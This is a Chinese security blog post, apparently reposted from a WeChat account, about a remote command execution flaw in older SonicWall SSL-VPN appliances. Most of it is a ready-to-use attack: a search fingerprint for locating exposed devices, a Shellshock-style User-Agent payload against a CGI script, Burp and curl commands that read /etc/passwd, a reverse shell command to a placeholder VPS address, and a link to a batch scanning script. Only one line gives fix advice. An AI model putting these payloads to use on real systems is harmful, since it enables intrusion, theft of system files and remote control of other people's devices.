SonicWall SSL-VPN RCE(远程命令执行)

admin 2022年6月29日19:02:05安全漏洞评论23 views1386字阅读4分37秒阅读模式


粗茶淡饭不要紧,朋友散场没关系,兵荒马乱也无所谓…

你拥有热气腾腾的灵魂,坚定不移的信念,

每一天都有突破,每一步都在前进,

坚持下去,沉淀下来。


日子总会变好。


SonicWall SSL-VPN  RCE(远程命令执行)

漏洞简介

SonicWallSSL-VPN 8.0.0.4之前版本,由于使用了旧版本内核以及HTTP CGI 可执行程序,无法正确的解析 http header,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限。

 

SonicWallSSL-VPN的fofa指纹

 

(body="login_box_sonicwall" ||header="SonicWALL SSL-VPN Web Server") && body="SSL-VPN"

 

影响版本

SonicWallSSL-VPN < 8.0.0.4

 

EXP


影响路径:https://x.x.x.x/cgi-bin/jarrewrite.sh位置:User-Agent: () { :; }; echo ; /bin/bash -c "cat/etc/passwd"

 

漏洞复现


 

SonicWall SSL-VPN  RCE(远程命令执行)


 

burpsuite改包重放:

 

GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: x.x.x.x
User-Agent: () { :; }; echo ; /bin/bash -c "cat/etc/passwd"
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



SonicWall SSL-VPN  RCE(远程命令执行)

 

hackbar:

 

URL=https://x.x.x.x/cgi-bin/jarrewrite.shUser Agent=() { :; }; echo ; /bin/bash -c "cat /etc/passwd"

 


 

SonicWall SSL-VPN  RCE(远程命令执行)

 

SonicWall SSL-VPN  RCE(远程命令执行)


 

Curl构造网络请求

 

 

curl -A "() { :; }; echo ; /bin/bash-c 'whoami'" https://x.x.x.x/cgi-bin/jarrewrite.sh -k





curl -A "() { :; }; echo ; /bin/bash-c 'cat /etc/passwd'" https://x.x.x.x/cgi-bin/jarrewrite.sh -k


SonicWall SSL-VPN  RCE(远程命令执行)

 

由于可以执行命令,也可以执行反弹shell命令获取反弹shell。


远程VPS nc监听1234端口后,


执行

curl -A "() { :; }; echo ; /bin/bash-c ' bash -i >& /dev/tcp/VPS的IP/1234  0>&1 '" https://x.x.x.x/cgi-bin/jarrewrite.sh-k

 


 SonicWall SSL-VPN  RCE(远程命令执行)

简单的批量检测脚本

 

https://github.com/luodameinv/SonicWallSSL-VPN_RCE

 

用法:将需要检测的url放入同一目录下的url.txt中

 

执行

 

python3 SonicWallSSL-VPN_RCE.py

 

实现截图:

 

SonicWall SSL-VPN  RCE(远程命令执行)


 

修复建议

 

升级到8.0.0.4以上版本


原文始发于微信公众号(Oriental rose):SonicWall SSL-VPN RCE(远程命令执行)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月29日19:02:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  SonicWall SSL-VPN RCE(远程命令执行) http://cn-sec.com/archives/945891.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: